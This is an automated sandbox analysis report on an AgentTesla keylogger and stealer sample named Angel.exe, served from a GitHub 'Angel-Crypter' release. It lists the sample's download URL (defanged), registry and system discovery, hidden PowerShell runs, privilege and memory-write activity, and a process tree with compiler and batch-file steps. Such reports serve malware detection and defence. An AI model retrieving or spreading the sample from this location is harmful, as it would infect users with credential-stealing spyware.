agenttesla | hxxps://github[.]com/venkovisual/Angel-Crypter/releases/download/V1/Angel[.]exe

Analysis

max time kernel
66s
max time network
64s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
05-09-2024 19:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/venkovisual/Angel-Crypter/releases/download/V1/Angel.exe

Score

10^/10

agenttesla discovery execution keylogger spyware stealer trojan

Malware Config

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

AgentTesla payload 1 IoCs

resource	yara_rule
behavioral1/memory/4476-6-0x0000000005C60000-0x0000000005E74000-memory.dmp	family_agenttesla

Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
5012	powershell.exe
4168	powershell.exe
4280	powershell.exe
2348	powershell.exe
4836	powershell.exe
2432	powershell.exe
2432	powershell.exe
5012	powershell.exe
4280	powershell.exe
2348	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	WScript.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Angel.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	powershell.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	powershell.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Angel.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	Angel.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	Angel.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	powershell.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133700381029464842"	msedge.exe

Modifies registry class 39 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	Angel.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	Angel.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	Angel.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295"	Angel.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}"	Angel.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Angel.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	Angel.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2170637797-568393320-3232933035-1000\{50492F81-50A9-4CE1-AAAF-5B659D56AFF5}	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Downloads"	Angel.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14"	Angel.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295"	Angel.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg	Angel.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16"	Angel.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	Angel.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	Angel.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1"	Angel.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff	Angel.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Angel.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Angel.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	Angel.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings	Angel.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	Angel.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e8005398e082303024b98265d99428e115f0000	Angel.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	Angel.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257"	Angel.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	Angel.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	Angel.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	Angel.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}	Angel.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	Angel.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	Angel.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"	Angel.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1"	Angel.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	Angel.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"	Angel.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Version = "1"	Angel.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
5012	powershell.exe
5012	powershell.exe
5012	powershell.exe
4168	powershell.exe
4168	powershell.exe
4168	powershell.exe
4280	powershell.exe
4280	powershell.exe
4280	powershell.exe
2348	powershell.exe
2348	powershell.exe
2348	powershell.exe
4836	powershell.exe
4836	powershell.exe
4836	powershell.exe
2432	powershell.exe
2432	powershell.exe
2432	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4476	Angel.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5012	powershell.exe
Token: SeDebugPrivilege	4168	powershell.exe
Token: SeIncreaseQuotaPrivilege	4168	powershell.exe
Token: SeSecurityPrivilege	4168	powershell.exe
Token: SeTakeOwnershipPrivilege	4168	powershell.exe
Token: SeLoadDriverPrivilege	4168	powershell.exe
Token: SeSystemProfilePrivilege	4168	powershell.exe
Token: SeSystemtimePrivilege	4168	powershell.exe
Token: SeProfSingleProcessPrivilege	4168	powershell.exe
Token: SeIncBasePriorityPrivilege	4168	powershell.exe
Token: SeCreatePagefilePrivilege	4168	powershell.exe
Token: SeBackupPrivilege	4168	powershell.exe
Token: SeRestorePrivilege	4168	powershell.exe
Token: SeShutdownPrivilege	4168	powershell.exe
Token: SeDebugPrivilege	4168	powershell.exe
Token: SeSystemEnvironmentPrivilege	4168	powershell.exe
Token: SeRemoteShutdownPrivilege	4168	powershell.exe
Token: SeUndockPrivilege	4168	powershell.exe
Token: SeManageVolumePrivilege	4168	powershell.exe
Token: 33	4168	powershell.exe
Token: 34	4168	powershell.exe
Token: 35	4168	powershell.exe
Token: 36	4168	powershell.exe
Token: SeIncreaseQuotaPrivilege	4168	powershell.exe
Token: SeSecurityPrivilege	4168	powershell.exe
Token: SeTakeOwnershipPrivilege	4168	powershell.exe
Token: SeLoadDriverPrivilege	4168	powershell.exe
Token: SeSystemProfilePrivilege	4168	powershell.exe
Token: SeSystemtimePrivilege	4168	powershell.exe
Token: SeProfSingleProcessPrivilege	4168	powershell.exe
Token: SeIncBasePriorityPrivilege	4168	powershell.exe
Token: SeCreatePagefilePrivilege	4168	powershell.exe
Token: SeBackupPrivilege	4168	powershell.exe
Token: SeRestorePrivilege	4168	powershell.exe
Token: SeShutdownPrivilege	4168	powershell.exe
Token: SeDebugPrivilege	4168	powershell.exe
Token: SeSystemEnvironmentPrivilege	4168	powershell.exe
Token: SeRemoteShutdownPrivilege	4168	powershell.exe
Token: SeUndockPrivilege	4168	powershell.exe
Token: SeManageVolumePrivilege	4168	powershell.exe
Token: 33	4168	powershell.exe
Token: 34	4168	powershell.exe
Token: 35	4168	powershell.exe
Token: 36	4168	powershell.exe
Token: SeIncreaseQuotaPrivilege	4168	powershell.exe
Token: SeSecurityPrivilege	4168	powershell.exe
Token: SeTakeOwnershipPrivilege	4168	powershell.exe
Token: SeLoadDriverPrivilege	4168	powershell.exe
Token: SeSystemProfilePrivilege	4168	powershell.exe
Token: SeSystemtimePrivilege	4168	powershell.exe
Token: SeProfSingleProcessPrivilege	4168	powershell.exe
Token: SeIncBasePriorityPrivilege	4168	powershell.exe
Token: SeCreatePagefilePrivilege	4168	powershell.exe
Token: SeBackupPrivilege	4168	powershell.exe
Token: SeRestorePrivilege	4168	powershell.exe
Token: SeShutdownPrivilege	4168	powershell.exe
Token: SeDebugPrivilege	4168	powershell.exe
Token: SeSystemEnvironmentPrivilege	4168	powershell.exe
Token: SeRemoteShutdownPrivilege	4168	powershell.exe
Token: SeUndockPrivilege	4168	powershell.exe
Token: SeManageVolumePrivilege	4168	powershell.exe
Token: 33	4168	powershell.exe
Token: 34	4168	powershell.exe
Token: 35	4168	powershell.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
4476	Angel.exe
4476	Angel.exe
4476	Angel.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4476 wrote to memory of 2856	4476	Angel.exe	113
PID 4476 wrote to memory of 2856	4476	Angel.exe	113
PID 4476 wrote to memory of 2856	4476	Angel.exe	113
PID 2856 wrote to memory of 3376	2856	csc.exe	115
PID 2856 wrote to memory of 3376	2856	csc.exe	115
PID 2856 wrote to memory of 3376	2856	csc.exe	115
PID 4476 wrote to memory of 4804	4476	Angel.exe	116
PID 4476 wrote to memory of 4804	4476	Angel.exe	116
PID 4476 wrote to memory of 4804	4476	Angel.exe	116
PID 4804 wrote to memory of 1816	4804	csc.exe	118
PID 4804 wrote to memory of 1816	4804	csc.exe	118
PID 4804 wrote to memory of 1816	4804	csc.exe	118
PID 1516 wrote to memory of 2700	1516	msedge.exe	120
PID 1516 wrote to memory of 2700	1516	msedge.exe	120
PID 1516 wrote to memory of 2448	1516	msedge.exe	121
PID 1516 wrote to memory of 2448	1516	msedge.exe	121
PID 1516 wrote to memory of 2448	1516	msedge.exe	121
PID 1516 wrote to memory of 2448	1516	msedge.exe	121
PID 1516 wrote to memory of 2448	1516	msedge.exe	121
PID 1516 wrote to memory of 2448	1516	msedge.exe	121
PID 1516 wrote to memory of 2448	1516	msedge.exe	121
PID 1516 wrote to memory of 2448	1516	msedge.exe	121
PID 1516 wrote to memory of 2448	1516	msedge.exe	121
PID 1516 wrote to memory of 2448	1516	msedge.exe	121
PID 1516 wrote to memory of 2448	1516	msedge.exe	121
PID 1516 wrote to memory of 2448	1516	msedge.exe	121
PID 1516 wrote to memory of 2448	1516	msedge.exe	121
PID 1516 wrote to memory of 2448	1516	msedge.exe	121
PID 1516 wrote to memory of 2448	1516	msedge.exe	121
PID 1516 wrote to memory of 2448	1516	msedge.exe	121
PID 1516 wrote to memory of 2448	1516	msedge.exe	121
PID 1516 wrote to memory of 2448	1516	msedge.exe	121
PID 1516 wrote to memory of 2448	1516	msedge.exe	121
PID 1516 wrote to memory of 2448	1516	msedge.exe	121
PID 1516 wrote to memory of 2448	1516	msedge.exe	121
PID 1516 wrote to memory of 2448	1516	msedge.exe	121
PID 1516 wrote to memory of 2448	1516	msedge.exe	121
PID 1516 wrote to memory of 2448	1516	msedge.exe	121
PID 1516 wrote to memory of 2448	1516	msedge.exe	121
PID 1516 wrote to memory of 2448	1516	msedge.exe	121
PID 1516 wrote to memory of 2448	1516	msedge.exe	121
PID 1516 wrote to memory of 2448	1516	msedge.exe	121
PID 1516 wrote to memory of 2448	1516	msedge.exe	121
PID 1516 wrote to memory of 2448	1516	msedge.exe	121
PID 1516 wrote to memory of 2448	1516	msedge.exe	121
PID 1516 wrote to memory of 2448	1516	msedge.exe	121
PID 1516 wrote to memory of 2448	1516	msedge.exe	121
PID 1516 wrote to memory of 2448	1516	msedge.exe	121
PID 1516 wrote to memory of 2448	1516	msedge.exe	121
PID 1516 wrote to memory of 2448	1516	msedge.exe	121
PID 1516 wrote to memory of 2448	1516	msedge.exe	121
PID 1516 wrote to memory of 2448	1516	msedge.exe	121
PID 1516 wrote to memory of 2448	1516	msedge.exe	121
PID 1516 wrote to memory of 2448	1516	msedge.exe	121
PID 1516 wrote to memory of 2448	1516	msedge.exe	121
PID 1516 wrote to memory of 2448	1516	msedge.exe	121
PID 1516 wrote to memory of 2448	1516	msedge.exe	121
PID 1516 wrote to memory of 2448	1516	msedge.exe	121
PID 1516 wrote to memory of 2448	1516	msedge.exe	121
PID 1516 wrote to memory of 2448	1516	msedge.exe	121
PID 1516 wrote to memory of 2448	1516	msedge.exe	121
PID 1516 wrote to memory of 2448	1516	msedge.exe	121
PID 1516 wrote to memory of 2448	1516	msedge.exe	121
PID 1516 wrote to memory of 2448	1516	msedge.exe	121

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/venkovisual/Angel-Crypter/releases/download/V1/Angel.exe
1⤵
PID:3796

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=4104,i,1602949858158667699,12464335823361976127,262144 --variations-seed-version --mojo-platform-channel-handle=3804 /prefetch:1
1⤵
PID:2896

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --field-trial-handle=4192,i,1602949858158667699,12464335823361976127,262144 --variations-seed-version --mojo-platform-channel-handle=3932 /prefetch:1
1⤵
PID:3088

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=5436,i,1602949858158667699,12464335823361976127,262144 --variations-seed-version --mojo-platform-channel-handle=5456 /prefetch:8
1⤵
PID:1508

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --field-trial-handle=5460,i,1602949858158667699,12464335823361976127,262144 --variations-seed-version --mojo-platform-channel-handle=5508 /prefetch:8
1⤵
PID:1316

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --field-trial-handle=6060,i,1602949858158667699,12464335823361976127,262144 --variations-seed-version --mojo-platform-channel-handle=6076 /prefetch:8
1⤵
PID:4780

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --field-trial-handle=6080,i,1602949858158667699,12464335823361976127,262144 --variations-seed-version --mojo-platform-channel-handle=6076 /prefetch:1
1⤵
PID:1660

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --field-trial-handle=6772,i,1602949858158667699,12464335823361976127,262144 --variations-seed-version --mojo-platform-channel-handle=6792 /prefetch:8
1⤵
PID:1220

C:\Users\Admin\Downloads\Angel.exe
"C:\Users\Admin\Downloads\Angel.exe"
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4476
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xdhzhiqv\xdhzhiqv.cmdline"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2856
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDA00.tmp" "c:\Users\Admin\Downloads\CSC2298B74C5E83454CAEC6D8AF9074F026.TMP"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3376
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qul1smtk\qul1smtk.cmdline"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4804
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDB77.tmp" "c:\Users\Admin\Downloads\CSCC465F4A4F1DF4FF69A3D73479A2E4D63.TMP"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1816

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1516
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=127.0.6533.89 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=127.0.2651.86 --initial-client-data=0x238,0x23c,0x240,0x214,0x260,0x7ffbb653d198,0x7ffbb653d1a4,0x7ffbb653d1b0
  2⤵
  PID:2700
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3068,i,14519597503484040591,4263337106537801603,262144 --variations-seed-version --mojo-platform-channel-handle=3080 /prefetch:2
  2⤵
  PID:2448
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --field-trial-handle=1860,i,14519597503484040591,4263337106537801603,262144 --variations-seed-version --mojo-platform-channel-handle=3220 /prefetch:3
  2⤵
  PID:4368
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --field-trial-handle=2132,i,14519597503484040591,4263337106537801603,262144 --variations-seed-version --mojo-platform-channel-handle=3324 /prefetch:8
  2⤵
  PID:1800
- C:\Program Files (x86)\Microsoft\Edge\Application\127.0.2651.86\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\127.0.2651.86\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --field-trial-handle=4520,i,14519597503484040591,4263337106537801603,262144 --variations-seed-version --mojo-platform-channel-handle=4548 /prefetch:8
  2⤵
  PID:2664
- C:\Program Files (x86)\Microsoft\Edge\Application\127.0.2651.86\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\127.0.2651.86\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --field-trial-handle=4520,i,14519597503484040591,4263337106537801603,262144 --variations-seed-version --mojo-platform-channel-handle=4548 /prefetch:8
  2⤵
  PID:1252

C:\Program Files (x86)\Microsoft\Edge\Application\127.0.2651.86\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\127.0.2651.86\elevation_service.exe"
1⤵
PID:5080

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4500

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Angel.bat" "
1⤵
PID:4672
- C:\Windows\system32\net.exe
  net file
  2⤵
  PID:2636
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 file
    3⤵
    PID:1560
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
